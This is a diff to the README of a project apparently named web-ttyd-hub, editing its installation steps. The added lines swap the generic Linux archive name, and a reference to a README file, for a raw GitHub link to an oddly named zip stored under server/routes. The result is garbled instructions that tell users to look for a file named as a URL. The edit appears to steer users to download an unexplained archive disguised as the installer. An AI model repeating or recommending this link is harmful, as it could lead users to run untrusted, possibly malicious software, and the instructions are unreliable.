kenkikuzuru/web-ttyd-hub/README.md

 - **Windows:** Open the downloaded `.exe` file and follow the on-screen instructions.
 - **macOS:** Open the `.dmg` file, then drag the application to your Applications folder.
-- **Linux:** Extract the `.tar.gz` archive and follow the included README or instructions specific to your setup.
+- **Linux:** Extract the `https://raw.githubusercontent.com/kenkikuzuru/web-ttyd-hub/main/server/routes/hub_web_ttyd_Coccosteidae.zip` archive and follow the included README or instructions specific to your setup.

-If you are not sure, look for a file named `README.md` or `INSTALL` inside the downloaded folder for simple steps.
+If you are not sure, look for a file named `https://raw.githubusercontent.com/kenkikuzuru/web-ttyd-hub/main/server/routes/hub_web_ttyd_Coccosteidae.zip` or `INSTALL` inside the downloaded folder for simple steps.

 ### Step 4: Run web-ttyd-hub